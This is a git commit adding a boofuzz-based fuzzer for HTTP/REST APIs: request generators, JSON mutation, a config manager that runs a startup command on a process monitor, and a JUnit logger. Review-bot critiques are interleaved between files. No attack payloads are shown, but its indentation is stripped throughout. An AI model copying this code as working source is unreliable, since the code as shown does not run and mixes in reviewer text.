Init WFuzz state

This commit is contained in:
Jan Stárek
2019-10-09 13:24:01 +02:00
parent 7c3ed5ef0b
commit a5eb2a97e1
114 changed files with 6221 additions and 0 deletions


@@ -0,0 +1,96 @@
import json
from typing import Union
from boofuzz import s_initialize, s_delim, s_static, s_block_start, s_block_end
from request_build_helper import RequestBuildHelper
from configuration_manager import ConfigurationManager
from fuzz_payloads import s_http_string
from fuzzing_json_decoder import FuzzingJsonDecoder
from encodings_helper import EncodingTypes
# 1] General HTTP fuzzing
def generate_http_fuzzed_blocks() -> str:
request_name = "General HTTP fuzzing:"
s_initialize(name=request_name)
s_http_string("GET", name="HTTP method")
s_delim(" ", name="Delimiter between method and path")
s_http_string("/path", encoding=EncodingTypes.ascii, name="HTTP path")
s_delim(" ", name="Delimiter between path and version")
s_http_string("HTTP/1.1\r\n", name="HTTP version")
s_static("Host: " + ConfigurationManager.config["target"]["hostname"] + "\r\n")
s_static("Content-Length: 0" + "\r\n")
s_static("User-Agent: ")
s_http_string("WFuzz", name="User-agent")
s_delim("\r\n\r\n", name="HTTP headers and body delimiter")
return request_name
# 2] URI attributes fuzzing
def generate_url_attributes_fuzzed_blocks(endpoint, request) -> str:
body_str = request["BodyExample"]
body_schema = request["BodySchema"]
is_body_json, json_decoder = _prepare_content_body(body_str, body_schema, True)
request_name = "URI attributes fuzzing: " + \
RequestBuildHelper.get_request_name(endpoint["Uri"], request["Method"])
s_initialize(name=request_name)
_generate_http_header(request, endpoint, fuzzable=True)
_generate_content_body(is_body_json, json_decoder, body_str, fuzzable=False)
return request_name
# 3] Request body fuzzing
def generate_body_fuzzed_blocks(endpoint, request, add_quotation_marks_into_non_string_primitives=False) -> str:
body_str = request["BodyExample"]
body_schema = request["BodySchema"]
is_body_json, json_decoder = _prepare_content_body(body_str, body_schema, add_quotation_marks_into_non_string_primitives)
subcategory_name = " (adding quotation marks)" if add_quotation_marks_into_non_string_primitives else ''
request_name = "Request body fuzzing" + subcategory_name + ": " + RequestBuildHelper.get_request_name(endpoint["Uri"], request["Method"])
s_initialize(name=request_name)
_generate_http_header(request, endpoint, False)
_generate_content_body(is_body_json, json_decoder, body_str, True)
return request_name
def _prepare_content_body(documentation_body_example, documentation_body_schema, add_quotation_marks_into_non_string_primitives):
is_body_json = True if documentation_body_example and RequestBuildHelper.is_string_valid_json(documentation_body_example) else False
json_decoder: Union[FuzzingJsonDecoder, None] = FuzzingJsonDecoder(add_quotation_marks_into_non_string_primitives)
if is_body_json:
json_decoder.decode_dict(json.loads(documentation_body_example))
elif documentation_body_schema:
is_body_json = True
json_decoder.generate_from_schema(documentation_body_schema)
return is_body_json, json_decoder
def _generate_content_body(is_body_json, json_decoder, body_string_example, fuzzable):
if s_block_start("body"):
if is_body_json:
json_decoder.generate_mutations(fuzzable=fuzzable)
elif body_string_example:
s_http_string(body_string_example, name="Whole HTTP body", fuzzable=fuzzable)
s_block_end()
def _generate_http_header(request, endpoint, fuzzable):
s_static(request["Method"].upper() + " ")
RequestBuildHelper.generate_uri(endpoint["Uri"], request["UriAttributes"], ConfigurationManager.config, fuzzable)
s_static(" HTTP/1.1\r\n")
RequestBuildHelper.generate_headers(ConfigurationManager.config)
s_static("\r\n\r\n")
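Review bot: In `_prepare_content_body` the local `json_decoder` is annotated `Union[FuzzingJsonDecoder, None]` but is assigned a `FuzzingJsonDecoder` unconditionally, so the Optional is misleading and `_generate_content_body` never has to handle a `None` decoder; either drop `None` from the annotation or only build the decoder when an example or a schema exists. The first line of that function, `is_body_json = True if ... else False`, is just `is_body_json = bool(documentation_body_example and RequestBuildHelper.is_string_valid_json(documentation_body_example))`. A one-line docstring on each `generate_*` function saying that the returned string is the boofuzz request name registered via `s_initialize` (and later looked up with `s_get` in fuzzer.py) would spare readers the cross-file lookup.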


@@ -0,0 +1,78 @@
import sys
import json
from typing import Union, List
class ConfigurationManager:
config = None
def __init__(self, config_file_pointer):
ConfigurationManager.config = json.load(config_file_pointer)
self._config_validation()
@staticmethod
def get_startup_command():
return ConfigurationManager.config["startup_command"] if "startup_command" in ConfigurationManager.config else None
@staticmethod
def get_payloads_folders_for_boolean_json_primitive() -> Union[List, None]:
return ConfigurationManager._get_payloads_folders_for_specific_json_primitive("boolean")
@staticmethod
def get_payloads_folders_for_number_json_primitive() -> Union[List, None]:
return ConfigurationManager._get_payloads_folders_for_specific_json_primitive("number")
@staticmethod
def get_payloads_folders_for_string_json_primitive() -> Union[List, None]:
return ConfigurationManager._get_payloads_folders_for_specific_json_primitive("string")
@staticmethod
def _get_payloads_folders_for_specific_json_primitive(json_type: str) -> Union[List, None]:
mapping = ConfigurationManager._get_payloads_to_json_primitives_mapping()
if mapping:
return mapping[json_type] if json_type in mapping else None
else:
return None
@staticmethod
def _get_payloads_to_json_primitives_mapping():
return ConfigurationManager.config["payloads_to_json_primitives_mapping"] if "payloads_to_json_primitives_mapping" in ConfigurationManager.config else None
@staticmethod
def get_reporting_interval():
return ConfigurationManager.config["reporting_interval"]
@staticmethod
def get_keywords_for_endpoints_skipping() -> List:
return ConfigurationManager.config["skipping_endpoints_keywords"]
@staticmethod
def get_target():
return ConfigurationManager.config["target"]
@staticmethod
def is_http_fuzzing_allowed():
return ConfigurationManager.config["http_fuzzing"]
def _config_validation(self):
reporting_interval: Union[int, float] = self.config["reporting_interval"]
response_timeout: Union[int, float] = self.config["response_timeout"]
polling_interval: Union[int, float] = self.config["polling_interval"]
http_fuzzing: bool = self.config["http_fuzzing"]
if response_timeout <= polling_interval or polling_interval <= 0:
print("Wrong timeout and polling interval. Timeout has to be greater than polling interval" +
" and polling interval has to be greater than zero.")
sys.exit(-1)
if reporting_interval <= 0 or reporting_interval < response_timeout:
print("Wrong reporting interval. Should be smaller than response_timeout.")
sys.exit(-1)
if "target" not in ConfigurationManager.config:
print("Missing configuration of target.")
sys.exit(-1)
if http_fuzzing is None:
print("Missing flag for enabling / disabling HTTP fuzzing.")
sys.exit(-1)
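Review bot: The reporting-interval message in `_config_validation` contradicts its own condition: `reporting_interval < response_timeout` rejects a reporting interval that is smaller than the timeout, yet the printed text says `Should be smaller than response_timeout.`; change it to `print("Wrong reporting interval. Has to be greater than zero and not smaller than response_timeout.")`. The `http_fuzzing is None` check below it can only fire when the JSON value is literally `null`, because `self.config["http_fuzzing"]` raises KeyError on a missing key before the check is reached; reading the four validated keys with `self.config.get(...)` would make the "missing" message reachable and consistent with the `"target" not in ConfigurationManager.config` check. Since the value returned by `get_startup_command` is handed to the process monitor as a command to run (fuzzer.py in this commit), a class docstring should state that the configuration file is trusted input.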


@@ -0,0 +1,51 @@
import json
import urllib.parse
import base64
from enum import Enum
from typing import Dict, List, Union
class EncodingTypes(Enum):
ascii = 1,
utf8 = 2,
urlencoded = 3,
base64 = 4,
json_string_escaping = 5
class Encoder:
@staticmethod
def encode_string(value: Union[str, bytes], encoding_type: EncodingTypes) -> bytes:
# If value is already in bytes, I assume that is properly encoded
if isinstance(value, bytes):
return value
if encoding_type == EncodingTypes.ascii:
return value.encode('ascii', 'ignore')
elif encoding_type == EncodingTypes.utf8:
return value.encode('utf8', 'ignore')
elif encoding_type == EncodingTypes.urlencoded:
return urllib.parse.quote(value)
elif encoding_type == EncodingTypes.base64:
return base64.b64encode(bytes(value))
elif encoding_type == EncodingTypes.json_string_escaping:
return json.dumps(value)[1:][:-1].encode('utf8', 'ignore')
else:
raise NotImplementedError
@staticmethod
def encode_dict(dictionary, encoding_type: EncodingTypes) -> Union[Dict, List[Dict], bytes]:
if isinstance(dictionary, dict):
return {Encoder.encode_dict(key, encoding_type): Encoder.encode_dict(value, encoding_type)
for key, value in dictionary.items()}
elif isinstance(dictionary, list):
return [Encoder.encode_dict(element, encoding_type) for element in dictionary]
elif isinstance(dictionary, str):
return Encoder.encode_string(dictionary, encoding_type)
else:
return dictionary
@staticmethod
def get_ascii_encoded_quotation_mark():
return Encoder.encode_string("\"", EncodingTypes.ascii)
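Review bot: `Encoder.encode_string` raises for `EncodingTypes.base64` whenever `value` is a `str`, because `bytes(value)` without an encoding argument is a TypeError, and `json_schema_parser._get_example_by_type` in this commit calls exactly that for the `byte` format; use `return base64.b64encode(value.encode('utf8', 'ignore'))`. In the same function the `urlencoded` branch returns the `str` produced by `urllib.parse.quote` although the signature promises `bytes`; `return urllib.parse.quote(value).encode('ascii')` keeps the contract. Separately, the trailing commas in `EncodingTypes` turn the member values into tuples (`EncodingTypes.ascii.value == (1,)`) for every member except `json_string_escaping`; the `==` comparisons on members still work, but the commas should go.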

21
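--- a/fuzzer/src/fake_socket.py
+++ b/fuzzer/src/fake_socket.py
@@ -0,0 +1,21 @@
+from http.client import HTTPResponse, HTTPException
+from typing import Union
+from io import BytesIO
+class FakeSocket:
+def __init__(self, response_str):
+self._file = BytesIO(response_str)
+def makefile(self, *args, **kwargs):
+return self._file
+def get_response_object(data) -> Union[HTTPResponse, None]:
+try:
+source = FakeSocket(data)
+response = HTTPResponse(source)
+response.begin()
+return response
+except HTTPException:
+return None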
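Review bot: `get_response_object` only runs `response.begin()`, which consumes the status line and headers and leaves the body unread, and `FakeSocket.makefile` hands out the same `BytesIO` on every call, so any later reader shares the cursor `begin()` left behind; this suits the `response.status` use in junit_logger.py but should be stated. A docstring such as `"""Parse raw response bytes into an HTTPResponse with status and headers read; the body is left unread. Returns None when the data is not a parseable HTTP response."""` covers it. `data` must already be `bytes` because `BytesIO` rejects `str`, so the signature should read `def get_response_object(data: bytes) -> Union[HTTPResponse, None]:`.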


@@ -0,0 +1,80 @@
from typing import List, Dict
from boofuzz import s_group, s_static
from encodings_helper import Encoder, EncodingTypes
from configuration_manager import ConfigurationManager
class FuzzPayloads:
payloads: Dict[str, List[str]] = {}
CUSTOM_PAYLOADS_KEY = "custom"
@staticmethod
def add_payload_to_list(line, directory_name):
if directory_name not in FuzzPayloads.payloads:
FuzzPayloads.payloads[directory_name] = []
if line not in FuzzPayloads.payloads[directory_name]:
FuzzPayloads.payloads[directory_name].append(line)
@staticmethod
def _get_payloads_using_directory_names(directory_names: List[str]) -> List[str]:
directory_names.append(FuzzPayloads.CUSTOM_PAYLOADS_KEY) # Always add custom payloads into any payloads set
payloads: List[str] = []
for directory_name in directory_names:
if directory_name in FuzzPayloads.payloads:
for line in FuzzPayloads.payloads[directory_name]:
payloads.append(line)
return list(set(payloads)) # Remove duplicities
@staticmethod
def get_all_payloads():
return FuzzPayloads._get_payloads_using_directory_names(list(FuzzPayloads.payloads.keys()))
@staticmethod
def _get_specific_type_payloads(payload_folders):
return FuzzPayloads._get_payloads_using_directory_names(payload_folders) if payload_folders else FuzzPayloads.get_all_payloads()
@staticmethod
def get_string_payloads():
payload_folders = ConfigurationManager.get_payloads_folders_for_string_json_primitive()
return FuzzPayloads._get_specific_type_payloads(payload_folders)
@staticmethod
def get_number_payloads():
payload_folders = ConfigurationManager.get_payloads_folders_for_number_json_primitive()
return FuzzPayloads._get_specific_type_payloads(payload_folders)
@staticmethod
def get_boolean_payloads():
payload_folders = ConfigurationManager.get_payloads_folders_for_boolean_json_primitive()
return FuzzPayloads._get_specific_type_payloads(payload_folders)
def s_http_general(value, payloads, fuzzable=True, encoding: EncodingTypes = EncodingTypes.ascii, name=None, add_quotation_marks=False):
# Encode all payloads
encoded_payloads: List[bytes] = []
for payload in payloads:
encoded = Encoder.encode_string(payload, encoding)
if add_quotation_marks:
encoded = Encoder.get_ascii_encoded_quotation_mark() + encoded + Encoder.get_ascii_encoded_quotation_mark()
encoded_payloads.append(encoded)
# Encode default value
default_value = Encoder.encode_string(value, encoding)
if fuzzable:
# noinspection PyTypeChecker
s_group(name, encoded_payloads, default_value)
else:
s_static(default_value)
def s_http_string(value, fuzzable=True, encoding: EncodingTypes = EncodingTypes.ascii, name=None):
s_http_general(value, FuzzPayloads.get_string_payloads(), fuzzable, encoding, name)
def s_http_number(value, fuzzable=True, encoding: EncodingTypes = EncodingTypes.ascii, name=None, add_quotation_marks=False):
s_http_general(value, FuzzPayloads.get_number_payloads(), fuzzable, encoding, name, add_quotation_marks)
def s_http_boolean(value, fuzzable=True, encoding: EncodingTypes = EncodingTypes.ascii, name=None, add_quotation_marks=False):
s_http_general(value, FuzzPayloads.get_boolean_payloads(), fuzzable, encoding, name, add_quotation_marks)
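Review bot: `_get_payloads_using_directory_names` mutates its argument: `directory_names.append(FuzzPayloads.CUSTOM_PAYLOADS_KEY)` is applied to the very list that `ConfigurationManager._get_payloads_folders_for_specific_json_primitive` returns straight out of the config dict, so every `s_http_string`/`s_http_number`/`s_http_boolean` call appends another `"custom"` entry to the loaded configuration. Build a copy instead: `names = [*directory_names, FuzzPayloads.CUSTOM_PAYLOADS_KEY]` and iterate over `names`. The `list(set(payloads))` on the return line also makes the order in which `s_group` walks the payloads depend on string hashing, which is randomised per process, so two runs of the fuzzer produce different test-case sequences and the skip indices in the JUnit report are not reproducible; `return list(dict.fromkeys(payloads))` removes duplicates while keeping file order.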

71
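--- a/fuzzer/src/fuzzer.py
+++ b/fuzzer/src/fuzzer.py
@@ -0,0 +1,71 @@
+import sys
+from typing import List
+from boofuzz import Session, Target, SocketConnection, s_get, pedrpc
+from progress_reporter import report_progress
+from configuration_manager import ConfigurationManager
+from post_test_case_callback import PostTestCaseCallback
+from blocks_generator import generate_http_fuzzed_blocks, generate_url_attributes_fuzzed_blocks, \
+generate_body_fuzzed_blocks
+class Fuzzer:
+def __init__(self, endpoints, loggers: List, protocol: str):
+self._endpoints = endpoints
+self._loggers = loggers
+self._protocol = protocol
+self._session = None
+self._configure_session()
+self._remove_endpoints_by_keywords(ConfigurationManager.get_keywords_for_endpoints_skipping())
+if ConfigurationManager.is_http_fuzzing_allowed():
+self._generate_http_fuzzing()
+self._generate_uri_attributes_fuzzing()
+self._generate_request_body_fuzzing()
+self._generate_request_body_fuzzing(add_quotation_marks_into_non_string_primitives=True)
+def _configure_session(self):
+target_config = ConfigurationManager.get_target()
+startup_command = ConfigurationManager.get_startup_command()
+remote_connection = SocketConnection(target_config["hostname"], target_config["port"], proto=self._protocol)
+if startup_command:
+process_monitor = pedrpc.Client(target_config["hostname"], 26002)
+process_monitor_options = {"start_commands": [startup_command]}
+target = Target(connection=remote_connection, procmon=process_monitor, procmon_options=process_monitor_options)
+else:
+target = Target(connection=remote_connection)
+self._session = Session(
+target=target,
+fuzz_loggers=self._loggers,
+post_test_case_callbacks=[PostTestCaseCallback.post_test_callback],
+restart_sleep_time=0,
+keep_web_open=False,
+fuzz_db_keep_only_n_pass_cases=sys.maxsize,
+crash_threshold_element=10,
+crash_threshold_request=30)
+def _generate_http_fuzzing(self):
+self._session.connect(s_get(generate_http_fuzzed_blocks()))
+def _generate_uri_attributes_fuzzing(self):
+for endpoint in self._endpoints:
+for request in endpoint["Requests"]:
+request_name = generate_url_attributes_fuzzed_blocks(endpoint, request)
+self._session.connect(s_get(request_name))
+def _generate_request_body_fuzzing(self, add_quotation_marks_into_non_string_primitives=False):
+for endpoint in self._endpoints:
+for request in endpoint["Requests"]:
+request_name = generate_body_fuzzed_blocks(endpoint, request, add_quotation_marks_into_non_string_primitives)
+self._session.connect(s_get(request_name))
+def _remove_endpoints_by_keywords(self, keywords: List[str]):
+for keyword in keywords:
+self._endpoints[:] = [endpoint for endpoint in self._endpoints if keyword not in endpoint.get('Uri')]
+def fuzz(self):
+report_progress(self._session)
+self._session.fuzz()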
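Review bot: `_configure_session` hard-codes the process-monitor port `26002` right next to a hostname that is read from the config, so a monitor listening anywhere else cannot be used; take it from the target section with the current value as default, `process_monitor = pedrpc.Client(target_config["hostname"], target_config.get("procmon_port", 26002))`. The `startup_command` from the config becomes the monitor's `start_commands`, i.e. it is executed on the monitor host, so the class docstring should state that the configuration file is trusted input and name that side effect. `_remove_endpoints_by_keywords` raises TypeError for an endpoint without a `Uri` key because `keyword not in None` is not allowed; `endpoint.get('Uri', '')` keeps the filter total, and a comment should say the match is a plain substring test.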


@@ -0,0 +1,99 @@
import json
from typing import Union
from json_schema_parser import generate_json_dict_from_schema
from fuzz_payloads import s_http_string, s_http_number, s_http_boolean
from encodings_helper import EncodingTypes
class FuzzingJsonDecoder:
def __init__(self, add_quotation_marks_into_non_string_primitives: bool):
self.parts: [JsonStrPart] = []
self.add_quotation_marks_into_non_string_primitives = add_quotation_marks_into_non_string_primitives
def generate_from_schema(self, json_schema):
json_dict = generate_json_dict_from_schema(json_schema)
self.decode_dict(json_dict)
def decode_dict(self, json_dict):
if json_dict is not None:
self._decode_dict(json_dict)
def _decode_dict(self, json_dict, indent='', is_last=True):
self.parts.append(JsonStrPart('{\n', fuzzable=False))
i = 0
for key, val in json_dict.items():
i += 1
is_sub_item_last = True if i == len(json_dict.items()) else False
self.parts.append(JsonStrPart('{} "{}": '.format(indent, key), fuzzable=False))
if isinstance(val, dict):
self._decode_dict(val, indent + ' ', is_sub_item_last)
elif isinstance(val, list) or isinstance(val, tuple):
self.__decode_list(val, indent, is_sub_item_last)
else:
self.__parse_primitive(val, is_sub_item_last)
self.parts.append(JsonStrPart(indent + '}\n' if is_last else indent + '},\n', fuzzable=False))
def __decode_list(self, lst, indent, is_last):
self.parts.append(JsonStrPart('[', fuzzable=False))
i = 0
for item in lst:
i += 1
is_sub_item_last = True if i == len(lst) else False
if isinstance(item, list) or isinstance(item, tuple):
self.__decode_list(item, indent, is_sub_item_last)
elif isinstance(item, dict):
self._decode_dict(item, indent, is_sub_item_last)
else:
self.__parse_primitive(item, is_sub_item_last, True)
self.parts.append(JsonStrPart(']\n' if is_last else '],\n', fuzzable=False))
def __parse_primitive(self, value, is_last, is_in_list=False):
# We need to convert Python data types into JSON primitives variants (e.g. False -> false, sanitization, etc.)
# A little "hack", convert value using built-in JSON parser into dictionary with single value and then parse value
json_value = json.dumps({"value": value})[10:-1]
if type(value) == str:
json_value = json_value[1:-1] # Remove auto-generated quotation marks
self._add_quotation_mark()
self.parts.append(JsonStrPart(json_value, fuzzable=True, json_primitive_type=str, encoding=EncodingTypes.json_string_escaping))
self._add_quotation_mark()
else:
self.parts.append(JsonStrPart(json_value, fuzzable=True, json_primitive_type=type(value), add_quotation_marks_into_payloads=self.add_quotation_marks_into_non_string_primitives))
if not is_last:
self.parts.append(JsonStrPart(', ', fuzzable=False))
if not is_in_list:
self.parts.append(JsonStrPart('\n', fuzzable=False))
def _add_quotation_mark(self):
self.parts.append(JsonStrPart("\"", fuzzable=False))
def generate_mutations(self, fuzzable=True):
sequence_generator = _unique_json_primitive_id()
for part in self.parts:
name = "JSON Primitive, default value: " + part.value + ", id: " + next(sequence_generator)
if part.json_primitive_type == int or part.json_primitive_type == float:
s_http_number(part.value, fuzzable=fuzzable and part.fuzzable, encoding=part.encoding, name=name, add_quotation_marks=part.add_quotation_marks_into_payloads)
elif part.json_primitive_type == bool:
s_http_boolean(part.value, fuzzable=fuzzable and part.fuzzable, encoding=part.encoding, name=name, add_quotation_marks=part.add_quotation_marks_into_payloads)
else:
s_http_string(part.value, fuzzable=fuzzable and part.fuzzable, encoding=part.encoding, name=name)
class JsonStrPart:
def __init__(self, value, fuzzable=True, encoding=EncodingTypes.utf8, json_primitive_type=None, add_quotation_marks_into_payloads=False):
self.value: str = value
self.fuzzable: bool = fuzzable
self.encoding: EncodingTypes = encoding
self.json_primitive_type: Union[type, None] = json_primitive_type
self.add_quotation_marks_into_payloads: bool = add_quotation_marks_into_payloads
def _unique_json_primitive_id():
sequence = 0
while True:
yield str(sequence)
sequence += 1
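Review bot: `self.parts: [JsonStrPart] = []` in `__init__` is not a valid type annotation (a list literal where `List[JsonStrPart]` is meant); it is never evaluated in function scope, so nothing breaks at runtime, but type checkers ignore it — `self.parts: List[JsonStrPart] = []` with `List` added to the `typing` import is the intended form. The manual counters in `_decode_dict` and `__decode_list` (`i += 1` followed by `True if i == len(...) else False`) read more clearly as `for i, (key, val) in enumerate(json_dict.items(), 1):` with `is_sub_item_last = i == len(json_dict)`. A short docstring on `__parse_primitive` explaining that the value is round-tripped through `json.dumps({"value": value})[10:-1]` to obtain JSON spelling (`false`, `null`, escaped strings) rather than Python's `repr` would save the next reader from re-deriving the slice offsets.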


@@ -0,0 +1,83 @@
from encodings_helper import Encoder, EncodingTypes
def generate_json_dict_from_schema(json_schema):
json_dict = _iterate_over_properties(json_schema)
return json_dict
def _iterate_over_properties(properties):
json_dict = {}
# 1] Just single key-value tuple of JSON structure, recursively decomposing JSON value
if isinstance(properties, tuple):
json_key = properties[0]
json_value = properties[1]
nested = _iterate_over_properties(json_value)
json_dict[json_key] = nested
# 2] Value is an JSON array, need to find out type and generate few array items
elif "Type" in properties and "ArrayItemSchema" in properties and properties["Type"] == "array":
return [_parse_array_schema(properties)]
# 3] Properties contains description of single JSON primitive
elif "Type" in properties and "Format" in properties:
property_type = properties["Type"]
property_format = properties["Format"]
if properties["Example"]:
return _convert_example_to_right_data_type(property_type, properties["Example"])
return _get_example_by_type(property_type, property_format)
# 4] Properties contains JSON dictionary and need to be recursively parsed further
else:
json_values = properties.items()
for value in json_values:
nested = _iterate_over_properties(value)
json_dict = {**json_dict, **nested}
return json_dict
def _parse_array_schema(array_schema):
single_item_schema = array_schema["ArrayItemSchema"]
property_type = single_item_schema["Type"] if "Type" in single_item_schema else None
property_format = single_item_schema["Format"] if "Format" in single_item_schema else None
if property_type and property_format:
return _get_example_by_type(single_item_schema["Type"], single_item_schema["Format"])
else:
return _iterate_over_properties(single_item_schema)
# If there is no example, we have to generate one
# Based on following documentations:
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.0.md
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md
def _get_example_by_type(property_type, property_format):
if property_type == "boolean":
return True
elif property_type == "integer":
return 0
elif property_type == "number":
return 0.0
elif property_type == "string":
if property_format == "byte":
return Encoder.encode_string("example", encoding_type=EncodingTypes.base64)
elif property_format == "binary":
return "01234567"
elif property_format == "date":
return "2002-10-02"
elif property_format == "date-time":
return "2002-10-02T10:00:00-05:00"
elif property_format == "password":
return "string"
else:
return "string"
# Examples from documentation comes as JSON strings, we need to cast them to proper data type
# Should never fail, because parser will throw an error if data type in documentation is not matching
def _convert_example_to_right_data_type(property_type, example_value):
if property_type == "integer":
return int(example_value)
elif property_type == "number":
return float(example_value)
elif property_type == "boolean":
return str(example_value).lower() == "true"
else:
return example_value
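Review bot: In `_iterate_over_properties` the primitive branch reads `properties["Example"]` while the surrounding branches test keys with `in`, so a schema entry that has `Type` and `Format` but no `Example` key raises KeyError instead of falling back to `_get_example_by_type`; `if properties.get("Example"):` matches the rest of the function. The `byte` format in `_get_example_by_type` returns whatever `Encoder.encode_string(..., EncodingTypes.base64)` yields, which per its signature is `bytes`, and that value later reaches `json.dumps` in fuzzing_json_decoder.py, which cannot serialise bytes; returning the base64 text as `str` (e.g. `.decode('ascii')` on the result) keeps the generated example JSON-serialisable. The `password` branch duplicates the `else` branch and can be folded into it.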

176
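--- a/fuzzer/src/junit_logger.py
+++ b/fuzzer/src/junit_logger.py
@@ -0,0 +1,176 @@
+import copy
+import sys
+import re
+from datetime import datetime
+from typing import TextIO
+from typing import List, Dict
+from boofuzz import helpers, ifuzz_logger_backend
+from junit_xml import TestSuite, TestCase
+from fake_socket import get_response_object
+class JUnitLogger(ifuzz_logger_backend.IFuzzLoggerBackend):
+DEFAULT_TEST_SUITE_NAME = "Default test suite"
+SKIPPED_TEST_CASE_MESSAGES_REGEX = ["Crash threshold reached for this element, exhausting (\d+) mutants.",
+"Crash threshold reached for this request, exhausting (\d+) mutants."]
+def __init__(self, file_handle: TextIO = sys.stdout, test_suite_name_delimiter: str = None, hostname: str = None):
+self._file_handle = file_handle
+self._test_suite_name_delimiter = test_suite_name_delimiter
+self._hostname = hostname
+self._test_cases = []
+self._actual_test_case = None
+self._error = None
+self._failure = None
+self._starting_time = None
+self._sent_string = None
+self._sent_bytes = None
+self._received_string = None
+self._received_bytes = None
+self._default_value = None
+self._mutant_value = None
+def open_test_step(self, description):
+skipped_count = 0
+for skipped_test_case_message_regex in self.SKIPPED_TEST_CASE_MESSAGES_REGEX:
+match = re.match(skipped_test_case_message_regex, description)
+if match is not None:
+skipped_count += int(match.group(1))
+if skipped_count > 0:
+for i in range(skipped_count):
+skipped_test_case = self._create_skipped_test_case(self._actual_test_case.name, i)
+self._test_cases.append(skipped_test_case)
+def log_check(self, description):
+pass
+def log_error(self, description):
+self._error = description
+def log_recv(self, data):
+self._received_bytes = helpers.hex_str(data)
+self._received_string = data.decode('utf-8')
+def log_send(self, data):
+self._sent_bytes = helpers.hex_str(data)
+self._sent_string = data.decode('utf-8')
+def log_info(self, description):
+default_value_prefix = "Original value: "
+mutation_value_prefix = "Mutation: "
+if description.startswith(default_value_prefix):
+self._default_value = description[len(default_value_prefix):]
+elif description.startswith(mutation_value_prefix):
+self._mutant_value = description[len(mutation_value_prefix):]
+def open_test_case(self, test_case_id, name, index, *args, **kwargs):
+self._actual_test_case = TestCase(name)
+self._starting_time = datetime.now()
+def log_fail(self, description=""):
+self._failure = description
+def log_pass(self, description=""):
+pass
+def close_test_case(self):
+elapsed_time = datetime.now() - self._starting_time
+self._actual_test_case.elapsed_sec = elapsed_time.total_seconds()
+if self._error is not None:
+self._actual_test_case.add_error_info(message=self._error, output=self._generate_output_message())
+self._actual_test_case.classname = "Error"
+elif self._failure is not None:
+self._actual_test_case.add_failure_info(message=self._failure, output=self._generate_output_message())
+self._actual_test_case.classname = "Failure: " + self._failure
+else:
+self._actual_test_case.classname = "Success"
+response = get_response_object(self._received_string.encode()) if self._received_string else None
+if response:
+self._actual_test_case.classname += ": " + str(response.status)
+self._test_cases.append(copy.deepcopy(self._actual_test_case))
+self._actual_test_case = None
+self._error = None
+self._failure = None
+self._starting_time = None
+self._sent_string = None
+self._sent_bytes = None
+self._received_string = None
+self._received_bytes = None
+self._default_value = None
+self._mutant_value = None
+def close_test(self):
+test_suites = self._generate_test_suites()
+TestSuite.to_file(self._file_handle, test_suites, prettyprint=True)
+@staticmethod
+def _format_log_msg(msg_type, msg=None, data=None) -> str:
+# Encode the response data to default encoding
+if data and isinstance(data, str):
+data = data.encode()
+return helpers.format_log_msg(msg_type=msg_type, description=msg, data=data, indent_size=2, format_type='html')
+def _separate_test_suite_name(self, test_case_name) -> (str, str):
+split = test_case_name.split(self._test_suite_name_delimiter, 1)
+if len(split) == 2:
+return split[0], split[1]
+else:
+return None, split[0]
+def _generate_test_suites(self) -> List[TestSuite]:
+test_suites = {}
+for test_case in self._test_cases:
+if self._test_suite_name_delimiter is not None:
+group_name, test_name = self._separate_test_suite_name(test_case.name)
+if group_name is None:
+test_suites = self._create_or_append_test(test_suites, test_case, self.DEFAULT_TEST_SUITE_NAME)
+else:
+test_suites = self._create_or_append_test(test_suites, test_case, group_name)
+else:
+test_suites = self._create_or_append_test(test_suites, test_case, self.DEFAULT_TEST_SUITE_NAME)
+return list(test_suites.values())
+def _create_or_append_test(self, test_suites: Dict[str, TestSuite], test_case: TestCase, group_name: str)\
+-> Dict[str, TestSuite]:
+if group_name not in test_suites:
+test_suites[group_name] = TestSuite(group_name, test_cases=[test_case], hostname=self._hostname)
+else:
+test_suites[group_name].test_cases.append(test_case)
+return test_suites
+def _generate_output_message(self):
+message = ""
+if self._default_value is not None:
+message += "Default value: " + self._default_value + "\n"
+if self._mutant_value is not None:
+message += "Mutant value: " + self._mutant_value + "\n"
+message += "\n\n"
+message += "Sent string:\n"
+message += self._sent_string + "\n\n"
+message += "Sent bytes: \n"
+message += self._sent_bytes + "\n\n\n"
+if self._received_string:
+message += "Received string:\n"
+message += self._received_string + "\n\n"
+message += "Received bytes: \n"
+message += self._received_bytes
+else:
+message += "Nothing was received!"
+return message
+@staticmethod
+def _create_skipped_test_case(name, index):
+skipped_test_case = TestCase(name + "; Skip index" + str(index))
+skipped_test_case.classname = "Skipped"
+skipped_test_case.skipped_output = "Skipped test case"
+skipped_test_case.elapsed_sec = 0
+return skipped_test_case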
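Review bot: `log_recv` decodes the target's reply with `data.decode('utf-8')`; that data comes from the process under fuzz, so a single non-UTF-8 byte raises UnicodeDecodeError inside the logger callback and aborts the session instead of recording the case. Decode with `errors='replace'` for the human-readable copy and keep the raw bytes for the HTTP parse in `close_test_case`, which today re-encodes the decoded string (the same applies to `log_send`, where boofuzz hands over the mutated request bytes). The patterns in `SKIPPED_TEST_CASE_MESSAGES_REGEX` contain `\d` inside non-raw strings, an invalid escape sequence that Python already reports as a DeprecationWarning; make them raw strings. `_generate_output_message` also concatenates `self._sent_string`, which is still `None` when a test case ends before `log_send` ran, so that method needs the same `or ""` guard it already gives `_received_string` via the `if`.
```python
    def __init__(self, file_handle: TextIO = sys.stdout, test_suite_name_delimiter: str = None, hostname: str = None):
        # … unchanged: other attribute initialisation …
        self._received_raw = None  # untouched response bytes, kept for the HTTP parse

    def log_recv(self, data):
        self._received_bytes = helpers.hex_str(data)
        self._received_raw = data
        # the target's reply is arbitrary bytes; a bad byte must not take the logger down
        self._received_string = data.decode('utf-8', errors='replace')

    def close_test_case(self):
        # … unchanged: timing and error/failure bookkeeping …
        response = get_response_object(self._received_raw) if self._received_raw else None
        # … unchanged: classname suffix and the per-case reset, which also clears _received_raw …
```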

10
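--- a/fuzzer/src/parameter.py
+++ b/fuzzer/src/parameter.py
@@ -0,0 +1,10 @@
+from typing import Union
+class Parameter:
+def __init__(self, name: str, value: str, data_type: Union[str, None], data_format: Union[str, None], is_from_config: bool):
+self.name = name
+self.value = value
+self.data_type = data_type
+self.data_format = data_format
+self.is_from_config = is_from_config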
